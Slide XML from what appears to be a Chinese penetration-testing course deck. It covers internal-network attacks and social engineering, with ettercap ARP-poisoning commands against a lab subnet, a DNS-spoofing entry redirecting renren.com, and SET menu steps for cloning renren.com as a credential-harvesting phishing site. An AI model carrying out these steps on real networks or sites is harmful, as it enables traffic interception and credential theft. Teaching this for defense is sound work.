                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP -S X.X.X.X XX-XX-XX-XX-XX-XX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>清空</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>缓存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipconfig /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flushdns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>欺骗局域网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.211.55.0/24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.211.55.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的主机：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> eth0 -T -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arp:remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /10.211.55.1/ /10.211.55.4/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{164A953E-A63F-44D0-99DF-E19079D266CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5505061" y="59469"/>
            <a:ext cx="6699638" cy="6798531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16574852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五、内网渗透</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10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335191" y="742260"/>
            <a:ext cx="11346735" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="pt-BR" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="pt-BR" sz="2400" dirty="0"/>
              <a:t>劫持基础上进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="pt-BR" sz="2400" dirty="0"/>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="pt-BR" sz="2400" dirty="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/etc/ettercap.dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="pt-BR" sz="2400" dirty="0"/>
              <a:t>文件设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>www.renren.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="pt-BR" sz="2400" dirty="0"/>
              <a:t>的域名解析为任意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="pt-BR" sz="2400" dirty="0"/>
              <a:t>地址：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="pt-BR" sz="2400" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.renren.com A 4.4.4.4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28390DF1-547F-4AAE-8001-8CE3E0C3ABC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2043275" y="2571750"/>
            <a:ext cx="6108700" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29C786BD-B565-43D1-B9C2-3BC4608CBCA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335191" y="3796300"/>
            <a:ext cx="8400661" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>则被劫持主机访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>www.renren.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>会被跳转到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4.4.4.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BC53390-813E-4232-8D4F-5D5BA2897A4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2043275" y="4625265"/>
            <a:ext cx="6108700" cy="1404620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349079892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2050"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311691" y="1124744"/>
            <a:ext cx="0" cy="4165600"/>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2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3791745" y="972516"/>
            <a:ext cx="7200800" cy="5441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介绍</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信息收集</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后门</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内网渗透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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>社会工程学</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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检测</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endParaRPr lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="791411" y="1858923"/>
            <a:ext cx="2208245" cy="2409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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5333" spc="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>教学大纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5333" spc="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103472582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六、社会工程学</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10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335191" y="1031509"/>
            <a:ext cx="11346735" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>社会工程学</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在计算机科学中，社会工程学指的是通过与他人的合法地交流，来使其心理受到影响，做出某些动作或者是透露一些机密信息的方式。 这通常被认为是一种欺诈他人以收集信息、行骗和入侵计算机系统的行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>社会工程学工具包（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）是一个开源的、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>驱动的社会工程学渗透测试工具。这套工具包由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>David Kenned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>设计，而且已经成为业界部署实施社会工程学攻击的标准。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>利用人们的好奇心、信任、贪婪及一些愚蠢的错误，攻击人们自身存在的弱点。使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可以传递攻击载荷到目标系统，收集目标系统数据，创建持久后门，进行中间人攻击等。本节将介绍社会工程学工具包的使用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{203092A0-926B-417F-AA0A-6D53D9BC2F3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3041650" y="442912"/>
            <a:ext cx="6108700" cy="5972175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1627507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六、社会工程学</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10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="335191" y="1031509"/>
            <a:ext cx="11346735" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>钓鱼网站</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中依次选择：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1) Social-Engineering Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2) Website Attack Vectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3) Credential Harvester Attack Method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2) Site Cloner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进行信息收集；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>设置克隆的目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>www.renren.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等站点克隆完成之后，本地就会运行目标站点的克隆钓鱼网站：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E6B42B-4CE3-4FF2-B21C-9EEB5858F247}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="572212" y="539634"/>
            <a:ext cx="11047575" cy="5778732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="455081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2050"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311691" y="1124744"/>
            <a:ext cx="0" cy="4165600"/>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2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3791745" y="972516"/>
            <a:ext cx="7200800" cy="5441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介绍</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信息收集</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后门</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内网渗透</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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>社会工程学</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPts val="5333"/>
              </a:lnSpc>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPts val="5333"/>
              </a:lnSpc>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2667" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="791411" y="1858923"/>
            <a:ext cx="2208245" cy="2409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bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
